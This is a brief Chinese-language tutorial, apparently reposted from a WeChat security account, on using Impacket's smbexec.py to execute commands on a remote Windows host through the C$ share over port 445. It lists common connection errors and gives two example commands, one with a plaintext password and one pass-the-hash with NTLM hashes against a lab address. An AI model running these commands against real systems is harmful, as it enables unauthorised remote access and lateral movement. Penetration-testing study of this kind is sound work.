smbexec可以通过文件共享在运程系统中执行命令。对方主机需要开启 c$ 共享,依赖于445端口。
如果对方没开启445端口,则报如下错:
[-] [Errno Connection error (xx.xx.xx.xx:445)] [WinError 10060] 由于连接方在一段时间后没有正确答复或连接的主机没有反应,连接尝 试失败。
如果对方开启了445端口,但是没有开启C$共享,则报如下错:
[-]SMB Session Error: STATUS_BAD_NETWORK_NAME({Network Name Not Found} The specified share name cannot be found on the remote server.)
命令如下:
./smbexec.py xie/hack:x123456./@192.168.10.130./smbexec.py xie/hack@192.168.10.130 -hashes aada8eda23213c027743e6c498d751aa:b98e75b5ff7a3d3ff05e07f211ebe7a8
本文始发于微信公众号(谢公子学安全):smbexec的使用(c$共享)
特别标注:
本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
- 我的微信
- 微信扫一扫
-
- 我的微信公众号
- 微信扫一扫
-
评论